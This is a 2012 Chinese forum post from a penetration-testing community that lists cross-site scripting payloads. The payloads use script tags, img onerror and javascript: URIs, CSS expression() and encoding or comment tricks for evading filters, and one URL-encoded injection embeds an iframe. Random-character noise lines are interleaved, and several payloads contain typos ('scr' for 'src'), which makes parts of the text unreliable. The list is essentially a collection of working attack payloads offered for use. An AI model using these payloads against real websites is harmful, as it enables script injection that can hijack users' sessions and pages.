中国网络渗透测试联盟
标题:
跨站语句大全
[打印本页]
作者:
admin
时间:
2012-9-13 17:15
标题:
跨站语句大全
<script>alert("跨站")</script> (最常用)
f" _; M0 G1 o; {7 \
<img scr=javascript:alert("跨站")></img>
1 q: K) l0 n) O2 Z
<img scr="javascript: alert(/跨站/)></img>
& {/ j+ a% o' [( [! x
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
* a3 z* s- A* @( \
<img scr="#" onerror=alert(/跨站/)></img>
' J7 A! o3 q* w& Z+ h& m
<img scr="#" style="xss:expression(alert(/xss/));"></img>
X/ n7 \( T; |7 s" y1 w M
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
1 {$ j* O' U* e. j* s/ {
<img src=vbscript:msgbox ("xss")></img>
+ D$ j( N3 I \2 Z. U/ ?
<style> input {left:expression (alert('xss'))}</style>
) p8 e+ l$ _5 i/ a( ]% U
<div style={left:expression (alert('xss'))}></div>
6 i& @' h3 L k4 R; N6 W3 G+ W
<div style={left:exp/* */ression (alert('xss'))}></div>
. d- _* h. S, ^/ h; \
<div style={left:\0065\0078ression (alert('xss'))}></div>
" s2 m; K7 S5 ]
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
0 v0 q& W& A4 l& Y9 B9 z
unicode <div style="{left:expRessioN (alert('xss'))}">
8 X4 l- o* L+ t
0 Y9 Y7 e5 I4 o
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
5 x$ j: G5 y) H- A) |
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2